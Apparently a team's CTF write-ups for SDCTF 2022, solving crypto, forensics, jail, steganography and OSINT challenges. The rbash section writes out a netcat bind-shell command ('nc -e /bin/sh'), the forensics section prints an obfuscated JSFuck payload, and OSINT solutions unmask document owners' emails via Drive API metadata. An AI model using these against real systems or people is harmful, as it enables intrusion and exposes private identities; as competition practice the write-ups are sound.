SDCTF 2022
crypto
Vinegar
Solved by - Avantika(iamavu)
Vinegar
My friend gave me another encrypted flag...I think they hate me! I heard them yell something about “Vinegar”, but I still don’t know what they’re talking about!
Ciphertext
{wbeyrjgewcfroggpesremvxgvefyrcmnnymxhdacgnnrwprhxpuyyaupbmskjrxfopr}
Note
My friend also yelled something about “preventing plaintext attacks” and said once I’ve decrypted this, I’ll need to append sdctf to the front of it.
As the name implies it is Vigenere cipher, we just need to bruteforce it.|
I googled for Vigenere bruteforce and the first tool did the trick
don’t forget to append sdctf in the beginning
FLAG :
sdctf{couldntuseleetstringsinthisonesadlybutwemadeitextralongtocompensate}
forensics
Flag Trafficker
Solved by: Taz34
We have a PCAP file, we launched it on wireshark. We used the filter for http and there we get a stream with huge length.
So we double click to open it we see some thing unusual
A button is created with an onclick option specified
<button type="button"
onclick="\\[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]\][([]\[(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([\][[]]+\[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([\][[]]+\[])[+[]]+([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]\]((!![]+[])\[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([\][[]]+\[])[+[]]+(!![]+[])[+!+[]]+([\][[]]+\[])[+!+[]]+(+[![]]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([\][[]]+\[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([\][[]]+\[])[+[]]+([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]\][([]\[[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([\][[]]+\[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([\][[]]+\[])[+[]]+([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]\](!+[]+!+[]+!+[]+[!+[]+!+[]])+(!\[]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]\][([]\[(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([\][[]]+\[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([\][[]]+\[])[+[]]+([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]\]((!![]+[])\[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([\][[]]+\[])[+[]]+(!![]+[])[+!+[]]+([\][[]]+\[])[+!+[]]+([]+[])[(![]+[])[+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([\][[]]+\[])[+!+[]]+(!![]+[])[+[]]+([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]\]()[+!+[]+[!+[]+!+[]]]+((![]+[])\[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([\][[]]+\[])[!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(![]+[])[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+([\][[]]+\[])[!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]]+(!![]+[])[+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[+!+[]]+[+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]]+[!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]])[(![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([\][[]]+\[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([\][[]]+\[])[+[]]+([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]\][([]\[[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([\][[]]+\[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([\][[]]+\[])[+[]]+([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]\](!+[]+!+[]+!+[]+[+!+[]])\[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[\][[]])\[+!+[]+[+[]]]+(!![]+[])[+[]]\]((!![]+[])\[+[]])[([\][(!![]+\[])[!+[]+!+[]+!+[]]+([\][[]]+\[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[\][[]])\[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]\]()+[])\[!+[]+!+[]+!+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([![]]+[\][[]])\[+!+[]+[+[]]]+([\][[]]+\[])[+!+[]]\](([\][(![]+\[])\[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]\][([]\[(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([\][[]]+\[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([\][[]]+\[])[+[]]+([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]\]((!![]+[])\[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([\][[]]+\[])[+[]]+(!![]+[])[+!+[]]+([\][[]]+\[])[+!+[]]+(![]+[+[]])[([![]]+[\][[]])\[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[\][[]])\[+!+[]+[+[]]]+([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]\]()[+!+[]+[+[]]]+![]+(![]+[+[]])\[([![]]+[\][[]])\[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[\][[]])\[+!+[]+[+[]]]+([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]\]()[+!+[]+[+[]]])()\[([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([\][[]]+\[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([\][[]]+\[])[+[]]+([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]\]((![]+[+[]])\[([![]]+[\][[]])\[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[\][[]])\[+!+[]+[+[]]]+([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]\]()[+!+[]+[+[]]])+\[])[+!+[]])+([]+[])[(![]+[])[+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([\][[]]+\[])[+!+[]]+(!![]+[])[+[]]+([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[\][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]\]()[+!+[]+[!+[]+!+[]]])())">
Click to display the flag!</button>
We simply ran it on a online html compiler, and when we click the button we have a dialog box displaying the flag.
Flag : sdctf{G3T_F*cK3d_W1r3SHaRK}
Susan album party
Solved by: Starry-lord
We get the file stub and notice its a jpeg image. Since it was pretty heavy, and this image looks like its very low res, it was almost sure there were stuff hidden inside. When opened into a image editor such as gimp, we see the first part of the flag:
This hinted at magic bytes for jpg files FFD8. At this point I turned the file to hex and looked for ffd8:
and found three files like that:
sdctf{FFD8_th3n_SOME_s7uff_FFD9} 'some' with a zero
jail
rbash warmup
Solved By : thewhiteh4t
we can use compgen to check for available commands
compgen -c
another way is to use echo
now the known way of escaping with nc is by getting a shell on our “attacker” box but in this challenge we are not allowed to connect to remote machines so we are left with localhost
actually this is more easy…
nc -lvp 4444 -e /bin/sh &
now we can connect to it !
rbash yet another calculator
Solved By : thewhiteh4t
challenge mentions that filename has been changed this time but it is in the same working directory
so we can again use echo to check the file name
just google “echo read file”
misc
Ishihara test++
Solved by: Taz34
Convert the image to PNG format, run it through stegsolve and change color planes multiple times till it gets readable.
And here is the flag: sdctf{c0untle55_col0rfu1_c0lors_cov3ring_3veryth1ng}
Bishop Duel
Solved by: Taz34
We have a chess board and we are playing as a white bishop and opponent as a black bishop. So for us to lose or win this game we need to be running our bishop on the same color, i.e. as in the image below we can see the opponent ‘BB’ can move on ‘’ spaces and we ‘WW’ can move on ‘\\’ spaces, so we need our bishop to move on ‘’ spaces.
So for that we need to get out of the board and there are tow ways out of the board i.e. the top right corner or the bottom left corner. So, I decided to move out of the top right. I used C1 then E2 and then we landed on a ‘__’ space.
Now just get in the way of the opponent to lose to get the flag.
Flag: sdctf{L0SiNG_y0uR_S0uRC3_C0d3_sUcKs}
osint
Mann-Hunt
Solved by: Avantika(iamavu)
Mann Hunt
We were on the trail of a notorious hacker earlier this week, but they suddenly went dark, taking down all of their internet presence...All we have is a username. We need you to track down their personal email address! It will be in the form ****.sdctf@gmail.com. Once you find it, send them an email to demand the flag!
Username
mann5549
We have a username mann5549, I checked in discord server, but couldn’t find anything
Let’s try to find social media accounts, usually I go with instant-username-search From there I got the twitter - https://twitter.com/mann5549
Which had the following website - https://mann.codes, though I couldn’t really find much on that website, even checked in WayBack Machine
Coding reminded me of GitHub, so I went and did a GitHub search for mann5549 but no such user, I though I should also query for the website name itself (mann.codes)
and I found the user. YAY.
Visiting the repository, and going through commits and specifically this file
[src/components/seo.js](https://github.com/manncyber/manncodes.github.io/commit/e81f6315e6a1ecc2277246547f85f3c9e0ebf11e#diff-46bb1d99a93bc5b6f63d50361abac9cc4c09038b92b77536c85a93ff2f8fc401)
I found a name
Let’s google this name and we get a LinkedIn the first search itself - https://www.linkedin.com/in/emanuel-hunt-34749a207/
A google drive file, let’s see what it is - https://drive.google.com/file/d/10No4G_5iv2t5jxbvg2-weXkFouZrnQtg/view No email sadly here D: but then I remembered we can look up metadata of google drive file via google’s API and possibly get the email let’s go to the Google API website - https://developers.google.com/drive/api/v3/reference/files/get
Reading the documentation, I realised we need the fileID, which is just present in the URL itself and we need to tell the API to show all possible field of metadata
Hit execute and boom we get the email ID - mann.sdctf@gmail.com
Now send a email to ID asking for flag, and soon we get a autoreply with the flag
FLAG - **sdctf{MaNN_tH@t_w@s_Ann0YinG}**
P.S.: Alternate way to check for docs email:
Google-Ransom
Solved by: Avantika (iamavu) and Starry-Lord
Google Ransom
Oh no! A hacker has stolen a flag from us and is holding it ransom. Can you help us figure out who created this document? Find their email address and demand they return the flag!
Ransom Letter - https://docs.google.com/document/d/1MbY-aT4WY6jcfTugUEpLTjPQyIL9pnZgX_jP8d8G2Uo/edit
We can find the owner of any drive file via google API, simply query the fileID which is present in the URL itself https://developers.google.com/drive/api/v3/reference/files/get
the * tells to print all possible fields in the metadata, we get the email as amy.sdctf@gmail.com send them a email and we get back our flag
FLAG - sdctf{0p3n_S0uRCE_1S_aMaz1NG}
Part of the ship
Solved by: Avantika(iamavu) and Starry-Lord
Part of the ship...
Sometimes I worry about my friend... he's way too into memes, he's always smiling, and he's always spouting nonsense about some "forbidden app." I don't know what he's talking about, but maybe you can help me figure it out! All I know is a username he used way back in the day. Good luck! Flag format is sdctf{flag}
Username
DanFlashes
“smiling” and “app”, reminded me of iFunny , I went to https://ifunny.co/user/DanFlashes but it gave a 404, so first thing usually which I do is check on wayback machine and boom, we got our flag https://web.archive.org/web/20220128003432/https://ifunny.co/user/DanFlashes
FLAG - sdctf{morning_noon_and_night_I_meme}
Additional details:
https://ifunny.co/picture/top-definition-part-of-the-ship-part-of-the-crew-LKPb8Zjx7
Samuel
Solved by : Avantika(iamavu) and Starry-Lord
We have a youtube video https://www.youtube.com/watch?v=fDGVF1fK1cA. We can see a blurry video, with a beacon going on and off in the night, with what seems like cable-cars or planes in the distance. Short light and long lights seemed like morse code. Here’s the decoded morse.
WHWHWHGODWROUGHT
https://www.history.com/.amp/this-day-in-history/what-hath-god-wrought
According to the link, Samuel Morse demonstrated the telegraph in 1844 with the sentence “what had God wrought”.
So we are looking for a beacon that sends the message in morse code, and I found this https://sculpturemagazine.art/mixed-messages-mark-bradfords-what-hath-god-wrought/
Avantika then found the location for this place on Google maps. https://www.google.com/maps/place/What+Hath+God+Wrought/@32.8752134,-117.2429636,17z/data=!3m1!4b1!4m5!3m4!1s0x80dc07e0d30e81a7:0x69087278617d6b1d!8m2!3d32.8752134!4d-117.2407749
sdctf{32.875,-117.240}
Paypal Playboy
Solved by: Starry-Lord
link for the mail: https://cdn.discordapp.com/attachments/808487148332122144/969683292918001787/mbox
Reading the mail shows us some base 64 encoded string, which is a commonly used Content-Transfer-Encoding for e-mails.
From flag.peddler@wehate.sdc.tf Sat Apr 23 00:39:01 2022
Delivered-To: [redacted]@gmail.com
Received: by 2002:a05:6520:266f:b0:1b9:b81b:dce2 with SMTP id il15csp1101047lkb;
Fri, 22 Apr 2022 17:39:02 -0700 (PDT)
X-Google-Smtp-Source: ABdhPJzxwJlzfSGrxfS8BUrPyF3Rv2x9sStBn/U0tFRYMXyPsNYCyOVhWQQn7IKnPNjwjmMRrzkp
X-Received: by 2002:a05:6402:d2:b0:413:2e50:d6fd with SMTP id i18-20020a05640200d200b004132e50d6fdmr7715550edu.171.1650674341863;
Fri, 22 Apr 2022 17:39:01 -0700 (PDT)
ARC-Seal: i=1; a=rsa-sha256; t=1650674341; cv=none;
d=google.com; s=arc-20160816;
b=BnpreoBKj7rM/1WsS1qGkQIpbJ5Q7glsLDD6PWDJRM4ChXRSMefEmwqElRjZAsNnxQ
WbkErwUv9FGbI9XDj0QRlgbcKOY+zfDryej6XaZQ7/YzfTNUYFVLQ9H1tFQvNV32oI9m
2d8eZn4LyHtp4x4M2nIplYo9EWPUObAd9/V2ajSdVBagveQXocWA28Sdcy2bflA0SplT
gOUu1TWsT1yD1aRwIzdwyJY8J139u02P7ZIjvO0OHunde46MKIlcA50KyumhKeTCyxqJ
YLjmgyw6Aey6PlG224L9Mslkcg739k81aUKUTMflpKGqxzM75UZepuCoKyVcwpCp+3vc
WFug==
ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816;
h=date:message-id:mime-version:reply-to:errors-to:importance:from
:subject:to;
bh=SklLFzj9D7lIOMbltmueGQUwZr9CMGutPIb3RqUNk6E=;
b=EEGOb2Wm/rKABjU6iN1Cv+E3b6mU3Ke04PhXntTkpa7vGH8WeZg7GCfg7dmrBLGyDb
nGC6L9utfPWqzL7tBmXDtyzqVJE/Qy82QujjnKuT5Vnxuwn1mU1ZOoAXr0KfyK8hOIe6
jn2nQGeADRUuEedqomYGjUH6RGjuU536npXLWtqmwIwWIRv08UYkItB6ma5pDuuyEdId
PBwv2ByfPMrReSahatKSk3FbvVuQMCqmHwSlvCIJC2fbNMVw64cQwyCP0sOl1CsFbu98
UmtH/8ptv3tavNNjIpNqvwCFyp9pbvqZvhOUwDakqV6rY2USr51DIBFymLBllWiCHupb
w2ZQ==
ARC-Authentication-Results: i=1; mx.google.com;
spf=neutral (google.com: 101.99.94.116 is neither permitted nor denied by best guess record for domain of flag.peddler@wehate.sdc.tf) smtp.mailfrom=flag.peddler@wehate.sdc.tf
Return-Path: <flag.peddler@wehate.sdc.tf>
Received: from emkei.cz (emkei.cz. [101.99.94.116])
by mx.google.com with UTF8SMTPS id c1-20020a170906694100b006df76385bb2si7985374ejs.82.2022.04.22.17.39.01
for <[redacted]@gmail.com>
(version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256);
Fri, 22 Apr 2022 17:39:01 -0700 (PDT)
Received-SPF: neutral (google.com: 101.99.94.116 is neither permitted nor denied by best guess record for domain of flag.peddler@wehate.sdc.tf) client-ip=101.99.94.116;
Authentication-Results: mx.google.com;
spf=neutral (google.com: 101.99.94.116 is neither permitted nor denied by best guess record for domain of flag.peddler@wehate.sdc.tf) smtp.mailfrom=flag.peddler@wehate.sdc.tf
Received: by emkei.cz (Postfix, from userid 33)
id 41BF9182372; Sat, 23 Apr 2022 02:39:01 +0200 (CEST)
To: [redacted]@gmail.com
Subject: very cheap banner
From: "cheap sdctf banner" <flag.peddler@wehate.sdc.tf>
X-Priority: 3 (Normal)
Importance: Normal
Errors-To: flag.peddler@wehate.sdc.tf
Reply-To: flag.peddler@wehate.sdc.tf
MIME-version: 1.0
Content-Type: multipart/mixed; boundary=BOUND_62634AA53D6521.02935547
Message-Id: <20220423003901.41BF9182372@emkei.cz>
Date: Sat, 23 Apr 2022 02:39:01 +0200 (CEST)
--BOUND_62634AA53D6521.02935547
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: base64
5Zyj5Zyw5Lqa5ZOl572R57uc5a6J5YWo6L+Q5Yqo5Lya55qE5buJ5Lu35qiq5bmF44CC5oiQ5Li6
IFNEQ1RGIOeahOi1ouWutuOAguW/q+aNt+aWueS+v+OAgueCueWHu+S4i+aWueOAguWco+WcsOS6
muWTpee9kee7nOWuieWFqOi/kOWKqOS8mueahOW7ieS7t+aoquW5heOAguaIkOS4uiBTRENURiDn
moTotaLlrrbjgILlv6vmjbfmlrnkvr/jgILngrnlh7vkuIvmlrnjgILlnKPlnLDkuprlk6XnvZHn
u5zlronlhajov5DliqjkvJrnmoTlu4nku7fmqKrluYXjgILmiJDkuLogU0RDVEYg55qE6LWi5a62
44CC5b+r5o235pa55L6/44CC54K55Ye75LiL5pa544CC5oKo5Lmf5Y+v5Lul5ZyoIFBheVBhbOaI
luiAheWMuuWdl+mTvuS4iuaJvuWIsOaIkeS7rOOAgjB4QkFkLi4uQTQzQi4uLi4uIFNEQ1RGe+S8
qumAoOeahF/ml5fluJx9IDPvuI/ig6Mg8J+SsCDinLPvuI8g8J+RnyDwn5izIPCfk5kg8J+NkyDw
n5i6IPCfkYgg8J+UoCDwn4+eIPCflpYg8J+QviDwn4OPIPCflZUg8J+QtiDwn5uPIPCflJEg4p2H
77iPIPCfkqkg4qyH77iPIPCfiLfvuI8g8J+RnSDwn5mIIPCfmoIg8J+UnSDimKog4pqh77iPIPCf
k6wg8J+YtyDwn4+oIPCfmoQg8J+PmSDwn5WcIOKGmO+4jyDwn42VIPCfkagg8J+MjyDil77vuI8g
8J+MjiDwn5i4IPCfjYQg4pyz77iPIPCflaEg8J+amyDwn5GnIPCflLsg4pmT77iPIPCflKAg8J+Y
rQ==
mbox part 1/2
This is some text in Chinese, which translates to the following:
Then we also have an attachment, named “pay.png” in Chinese:
mbox part 2/2
--BOUND_62634AA53D6521.02935547
Content-Type: image/png; name="支付.png"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="支付.png"
iVBORw0KGgoAAAANSUhEUgAAAUYAAAFOCAYAAAD6hLSdAAABPmlDQ1BJQ0MgUHJvZmlsZQAAKJFj
YGASSCwoyGFhYGDIzSspCnJ3UoiIjFJgf8bAwiDMIMigxcCXmFxc4BgQ4ANUwgCjUcG3awyMIPqy
Lsisncmnb3+YKdt7w+KqjrKaJjemehTAlZJanAyk/wBxYnJBUQkDA2MCkK1cXlIAYrcA2SJFQEcB
2TNA7HQIew2InQRhHwCrCQlyBrKvANkCyRmJKUD2EyBbJwlJPB2JDbUXBNiNzH0DjI0JuJQMUJJa
UQKinfMLKosy0zNKFByBIZSq4JmXrKejYGRgZMTAAApviOrPN8DhyCjGgRArBPrPypOBgSkXIZYQ
wMCw4wPImwgxVR0GBp7jDAwHYgsSixLhDmD8xlKcZmwEYXNvZ2Bgnfb//+dwoJc1GRj+Xv////f2
////LmNgYL4F1PsNABfNXW1QnDRZAAAAYmVYSWZNTQAqAAAACAACARIAAwAAAAEAAQAAh2kABAAA
AAEAAAAmAAAAAAADkoYABwAAABIAAABQoAIABAAAAAEAAAFGoAMABAAAAAEAAAFOAAAAAEFTQ0lJ
